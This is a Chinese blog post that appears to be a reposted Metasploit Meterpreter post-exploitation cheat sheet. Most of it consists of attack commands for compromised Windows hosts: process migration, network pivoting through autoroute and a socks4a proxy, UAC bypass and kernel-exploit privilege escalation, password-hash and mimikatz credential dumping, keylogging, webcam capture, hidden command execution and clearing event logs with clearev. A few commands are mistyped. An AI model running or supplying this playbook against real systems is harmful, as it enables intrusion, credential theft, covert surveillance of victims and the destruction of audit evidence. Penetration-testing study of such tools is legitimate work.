meterpreter后渗透攻击

Posted lisenMiller

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了meterpreter后渗透攻击相关的知识,希望对你有一定的参考价值。

Meterpreter后渗透

msf提供了非常强大的后渗透工具-meterpreter.获取目标机的meterpreter后有以下优势

  • 纯内存工作模式
  • 加密通信协议,而且同时与几个通道通信
  • 攻击进程内工作,多进程内迁移
  • 平台互通

进程迁移

通过浏览器的shell可能是一个脆弱的shell,将shell和一个稳定的进程绑定到一起,就不需要对磁盘进行任何写入操作.

1.meterpreter手工迁移

getpid命令查看自己的pid是多少
#迁移进程 找到一些比较经常出现在进程而且较稳定的服务进行迁移
migrate pid

#原本的进程会自动关闭,为了确保不存在最好再使用kill -9 pid强制删除

2.msf利用模块迁移

run post/windows/manage/migrate

系统命令

1.收集系统信息

sysinfo

2.查看网络设置

route

3.查看当前权限

getuid

4.查看网络结构

先进行跳转,输入background将meterpreter中断隐藏在后台

route add命令添加路由,

meterpreter > background
  backgrounding session 1 . . .
msf > route add 192.168.1.0 255.255.255.0 1(session 1的意思)
msf > route print

active routing table
subnet      netmask    gateway
192.168.1.0   255.255.255.0  session 1

网络类命令

ipconfig/ifconfig
arp -a
netstat -ano 

getproxy    #查看代理信息
route      #路由

端口转发

portfwd add -l 6666 -p 3389 - r 127.0.0.1    #将目标机的3389端口转发到本地6666端口

autoroute添加路由

run get_local_subnets
run autoroute -s 192.168.1.0/24    #添加到目标环境网络
run autoroute -p     #查看添加的路由

socks4a代理

autoroute添加完路由后,利用msf自带的socks4a代理

msf > use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

vi /etc/proxychains.conf    
socks4 127.0.0.1 1080

利用proxichains 访问

提权

getsystem提权

bypassuac提权

search bypassuac
有以下几个

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

 

例如:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

再次执行getsystem获取系统权限

内核漏洞提权

先用enum_patches收集补丁信息,查找可用的exploit进行提权

search enum_patches

meterpreter > run post/windows/gather/enum_patches    #查看补丁信息
msf > use exploit/windows/localms13_053_schlamperei
msf  > set session 2
msf > exploit

文件系统命令

1.查看当前处于目标机的哪个目录

pwd / getwd

getlwd:查看当前处于本地的某个目录

ls:列出当前目录所有文件

2.搜索指定类型的文件

search -f *.txt -d c:\\

-f 用于指定搜索文件  -d 指定哪个目录下进行搜索

3.下载文件

download 目标机文件 攻击机目录

download c:\\test.txt /root

4.上传文件

upload 攻击机文件 目标机路径

5在目标机切换目录

lcd /tmp    #操作攻击者主机 切换目录

抓密码

mimikatz抓

load kiwi
creds_all
1.hashdump
2.run windows/gather/smart_hashdump
3.run windows/gather/credentials/windows_autologin

清除日志

clearev  #清除windows中的应用程序日志、系统日志、安全日志

执行文件

execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

 获得shell以后的获取敏感文件操作

判断是否为多网卡机器扫描其他网段

尽量收集机器上的敏感信息,敏感内部文件,账号密码本等

1.抓取自动登录的密码

run windows/gather/credentials/windows_autologin  #抓取用户存储的自动登录账户密码

2导出密码hash

hashdump

 3.查看权限后,抓取密码

getuid

#load mimikatz开启功能 / load kiwi
creds_all  #抓取密码 retrieving all credentials

 

Metasploit渗透——meterpreter基础命令

Meterpreter
系统信息

sysinfo

用户标识

getuid

获取权限

getsystem

当前目录

pwd

列举进程

ps

键盘记录

##扫描远程计算机键盘活动
keyscan_start

##显示远程计算机键盘活动
keyscan_dump

##停止扫描远程计算机键盘活动
keyscan_stop

显示驱动器

show_mount

截屏
保存远程PC的屏幕截图

screenshot

从kali上传文件

upload /root/abc.exe C:\\\\system32\\\\

下载

download C:\\\\pass.txt /root/

获取远程计算机的cmd

shell

服务器sid

getsid

远程计算机IP地址及Mac地址

ipconfig

将当前活动的Meterpreter会话发送到后台

background

将当前进程从一个端口迁移到另一个

migrate <端口>

重启远程计算机

reboot

摄像头

##查看是否具有摄像头
webcarm_list

##摄像头拍摄照片
webcam_snap

##摄像头开启视频
webcam_stream

当前进程的pid

getpid

当地时间

localtime

生成文件hash值

checksum md5 abc.txt

读取文件

cat my.ini

复制文件

cp abc.txt pass.txt
cp <旧文件> <新文件>

目录

dir

编辑文件

edit abc.txt
##和vim命令的使用方法相同

移动文件

mv <旧文件目录> <新文件目录>
##和linux中的mv命令相同

删除文件

rm <file1> <file2> ...
##和linux中的rm命令相同

创建目录

mkdir <目录名1> <目录名2> ...

搜索

search -f *.jpeg

开启靶机3389端口

run getgui -e

枚举账户hash散列值

run hashdump

列举后渗透模块

load -l

以上是关于meterpreter后渗透攻击的主要内容,如果未能解决你的问题,请参考以下文章

kali-漏洞利用(3.3)后渗透之Meterpreter(上):命令大全

内网渗透之ms17-010

内网渗透--对不出网目标的打法

【渗透测试】-工具之MSF

Metasploit渗透——meterpreter基础命令

Metasploit渗透——meterpreter基础命令